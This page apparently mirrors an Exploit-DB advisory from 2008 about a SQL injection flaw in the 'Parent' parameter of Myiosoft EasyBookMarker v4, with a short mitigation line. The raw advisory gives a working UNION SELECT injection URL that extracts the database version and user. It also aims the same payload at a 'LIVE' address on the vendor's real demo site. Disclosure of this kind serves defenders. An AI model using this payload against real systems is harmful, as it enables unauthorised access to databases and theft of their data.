header-logo
Suggest Exploit
vendor:
EasyBookMarker
by:
G4N0K
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EasyBookMarker
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: a:myiosoft:easybookmarker:4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability

Myiosoft EasyBookMarker v4 (Parent) is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information such as version and user details. The vulnerable parameter is 'Parent' which can be found in the URL http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability
==============================================================================

	[»] Script:             [ Myiosoft EasyBookMarker ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://myiosoft.com/?1.4.0.0 ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 07.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[»] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--


===[ LIVE ]===

	[»] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--



	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit(); //EoX
===============================================================================

# milw0rm.com [2008-11-07]

Navigation

Suggest Exploit

Services By CQR